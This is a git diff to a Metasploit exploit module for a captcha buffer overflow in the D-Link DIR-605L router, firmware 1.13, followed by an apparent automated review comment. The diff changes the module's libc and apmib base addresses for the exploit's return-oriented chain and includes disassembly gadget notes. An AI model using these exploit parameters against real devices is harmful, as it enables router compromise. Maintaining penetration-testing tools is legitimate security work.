diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
index 1c441c0b93..ca1b997239 100644
--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'DLink DIR-605L 1.13',
 {
 'Offset' => 94,
- 'LibcBase' => 0x4212e000, # QEMU environment
- 'ApmibBase' => 0x42095000, # QEMU environment
+ 'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
+ 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
+ #'LibcBase' => 0x4212e000, # QEMU environment
+ #'ApmibBase' => 0x42095000, # QEMU environment
 #LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
 #LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
 #LOAD:000248DC jalr $t9
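Review bot: The two added `#'LibcBase'` / `#'ApmibBase'` lines keep the old QEMU values as commented-out hash entries inside the target's option hash, which reads as dead code and makes it easy to re-enable one key without the other. If the emulator values are worth keeping, a single explanatory comment such as `# Under QEMU emulation the bases were LibcBase 0x4212e000 / ApmibBase 0x42095000` documents them without looking like disabled configuration. The new trailing comments also give only the provenance of the addresses ("According to Original Exploit by Craig Heffner") and do not say whether they were confirmed on hardware running firmware 1.13; stating that in the comment would tell a maintainer how much to trust them. The target hash begins and continues outside this hunk.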